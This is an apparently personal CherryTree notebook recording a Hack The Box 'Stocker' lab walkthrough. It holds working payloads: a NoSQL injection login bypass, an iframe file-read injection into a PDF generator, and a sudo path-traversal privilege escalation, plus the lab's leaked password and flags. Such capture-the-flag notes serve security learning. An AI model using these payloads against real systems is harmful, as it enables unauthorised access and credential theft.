<?xml version="1.0" encoding="UTF-8"?>
<cherrytree>
  <bookmarks list=""/>
  <node name="Stocker" unique_id="1" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1674995836" ts_lastsave="1675028949">
    <rich_text>IP = 10.10.11.196
hostname = stocker.htb
OS:



Linux Proof: </rich_text>
    <rich_text family="monospace">cat proof.txt &amp;&amp; hostname &amp;&amp; id &amp;&amp; whoami &amp;&amp; /sbin/ifconfig</rich_text>
    <rich_text>
Windows Proof: </rich_text>
    <rich_text family="monospace">hostname &amp;&amp; whoami.exe &amp;&amp; whoami.exe /groups &amp;&amp; type proof.txt &amp;&amp; ipconfig /all</rich_text>
    <rich_text>
</rich_text>
    <node name="nmap" unique_id="2" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1674996889" ts_lastsave="1674997841">
      <rich_text>nmap Scan

</rich_text>
      <rich_text justification="left"></rich_text>
      <rich_text>



Ports: 80,22

We see stocker.htb adding it to /etc/hosts


just checking OS finger printing:

</rich_text>
      <rich_text justification="left"></rich_text>
      <codebox char_offset="11" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0"># Nmap 7.92 scan initiated Sun Jan 29 12:51:42 2023 as: nmap -A -v -p22,80 -oA Stocker/nmap/all 10.10.11.196
WARNING: RST from 10.10.11.196 port -1 -- is this port really open?
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.19s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp filtered http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: remote management|phone|general purpose|webcam|storage-misc
Running: Avocent embedded, Google Android 2.X, Linux 2.6.X, AXIS embedded, ZyXEL embedded
OS CPE: cpe:/o:google:android:2.2 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera cpe:/h:zyxel:nsa-210
OS details: Avocent/Cyclades ACS 6000, Android 2.2 (Linux 2.6), Linux 2.6.14 - 2.6.34, Linux 2.6.17, Linux 2.6.17 (Mandriva), Linux 2.6.32, AXIS 210A or 211 Network Camera (Linux 2.6.17), ZyXEL NSA-210 NAS device
Network Distance: 2 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   217.77 ms 10.10.14.1
2   217.87 ms stocker.htb (10.10.11.196)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 29 12:51:57 2023 -- 1 IP address (1 host up) scanned in 15.88 seconds</codebox>
      <codebox char_offset="110" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">sudo nmap -O stocker.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-29 13:02 GMT
Nmap scan report for stocker.htb (10.10.11.196)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/29%OT=22%CT=1%CU=40412%PV=Y%DS=2%DC=I%G=Y%TM=63D66E9
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.14 seconds
</codebox>
    </node>
    <node name="Port80" unique_id="3" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1674997213" ts_lastsave="1675027984">
      <rich_text scale="h3">## Directory Bruteforce:</rich_text>
      <rich_text>

</rich_text>
      <rich_text justification="left"></rich_text>
      <rich_text>	

since we didnt get anything lets bruteforce subdomains:


## Subdomain Enum:

 	
 
 We found this following:
 


lets add it to /etc/hosts

if we open </rich_text>
      <rich_text link="webs https://dev.stocker.htb">https://dev.stocker.htb</rich_text>
      <rich_text> we see login page


tried default credentials but they didnt work

SQL injection didnt work

</rich_text>
      <codebox char_offset="26" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://stocker.htb/FUZZ -of html -o ffuf/ffuf.html

</codebox>
      <codebox char_offset="109" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u stocker.htb -t 50 --append-domain -o subdomainEnum/gobuster.log	</codebox>
      <codebox char_offset="142" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0"> Found: dev.stocker.htb Status: 302 [Size: 28] [--&gt; /login]</codebox>
    </node>
    <node name="Nosql injection" unique_id="4" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1675027997" ts_lastsave="1675028240">
      <rich_text>on checking the details from this: </rich_text>
      <rich_text link="webs https://github.com/nigamelastic/cheat-sheets/blob/main/Pentesting/vulnerabilities/SQLInjection/NoSQLInjection.md">https://github.com/nigamelastic/cheat-sheets/blob/main/Pentesting/vulnerabilities/SQLInjection/NoSQLInjection.md</rich_text>
      <rich_text>

We use the following no SQL injection




and it gives us the following output


Since its redirecting , right clock and open in browser.

we are redirected to the following:
</rich_text>
      <rich_text link="webs http://dev.stocker.htb/stock">http://dev.stocker.htb/stock</rich_text>
      <rich_text>
</rich_text>
      <codebox char_offset="188" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">POST /login HTTP/1.1&#13;
Host: dev.stocker.htb&#13;
Content-Length: 55&#13;
Cache-Control: max-age=0&#13;
Upgrade-Insecure-Requests: 1&#13;
Origin: http://dev.stocker.htb&#13;
Content-Type: application/json&#13;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36&#13;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&#13;
Referer: http://dev.stocker.htb/login&#13;
Accept-Encoding: gzip, deflate&#13;
Accept-Language: en-US,en;q=0.9&#13;
Cookie: connect.sid=s%3AtZWNEQmZscW9FSYRdih6XIz1PoVdpuCW.DjRubEMdQJLube8Lw40Z2e0RRCZGMezCJo%2F6%2FA%2BbwoE&#13;
Connection: close&#13;
&#13;
{"username":{"$ne":"admin"}, "password":{"$ne":"pass"}}</codebox>
      <codebox char_offset="229" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">HTTP/1.1 302 Found&#13;
Server: nginx/1.18.0 (Ubuntu)&#13;
Date: Sun, 29 Jan 2023 21:33:22 GMT&#13;
Content-Type: text/html; charset=utf-8&#13;
Content-Length: 56&#13;
Connection: close&#13;
X-Powered-By: Express&#13;
Location: /stock&#13;
Vary: Accept&#13;
&#13;
&lt;p&gt;Found. Redirecting to &lt;a href="/stock"&gt;/stock&lt;/a&gt;&lt;/p&gt;</codebox>
    </node>
    <node name="Exploring Stock" unique_id="5" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1675028290" ts_lastsave="1675028930">
      <rich_text>Check deeper to identify pdf

using this payload u can get the password from index.js file by adding it in the title in the json



so we login via ssh to get the user flag




</rich_text>
      <codebox char_offset="130" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="json" highlight_brackets="1" show_line_numbers="0">“title”:"&lt;iframe src=file:///var/www/dev/index.js height=1000px width=1000px&gt;&lt;/iframe&gt;"</codebox>
      <codebox char_offset="175" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">sh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" angoose@10.10.11.196 
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 
Last login: Sun Jan 29 18:22:02 2023 from 10.10.14.46
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt 
c7aaf9a57f9d9dd4c588026dc5619a86
angoose@stocker:~$ u</codebox>
    </node>
    <node name="Privelege escalation" unique_id="6" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1675028949" ts_lastsave="1675029917">
      <rich_text>Checking </rich_text>
      <rich_text scale="small" weight="heavy">sudo</rich_text>
      <rich_text> priveleges with </rich_text>
      <rich_text family="monospace">sudo -l</rich_text>
      <rich_text>

pw: IHeardPassphrasesArePrettySecure



</rich_text>
      <rich_text justification="left"></rich_text>
      <rich_text>

Since we can run a js file via node we can use this to do priv esc and use the js file to read files here is the dummy code

lets check the version of node


on searching we find the following :
</rich_text>
      <rich_text link="webs https://nodejs.dev/en/learn/reading-files-with-nodejs/">https://nodejs.dev/en/learn/reading-files-with-nodejs/</rich_text>
      <rich_text>

updating it for our use we add a temp1.js with the following code:





</rich_text>
      <codebox char_offset="79" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">angoose@stocker:~$ sudo -l
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js
</codebox>
      <codebox char_offset="238" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">angoose@stocker:~$ node -v
v18.12.1</codebox>
      <codebox char_offset="402" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="js" highlight_brackets="1" show_line_numbers="0">const fs = require('fs');

try {
  const data = fs.readFileSync('/root/root.txt', 'utf8');
  console.log(data);
} catch (err) {
  console.error(err);
}
</codebox>
      <codebox char_offset="407" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/temp1.js 
1d4c665dc3c85ed324abe80e31c0e80f

</codebox>
    </node>
  </node>
</cherrytree>
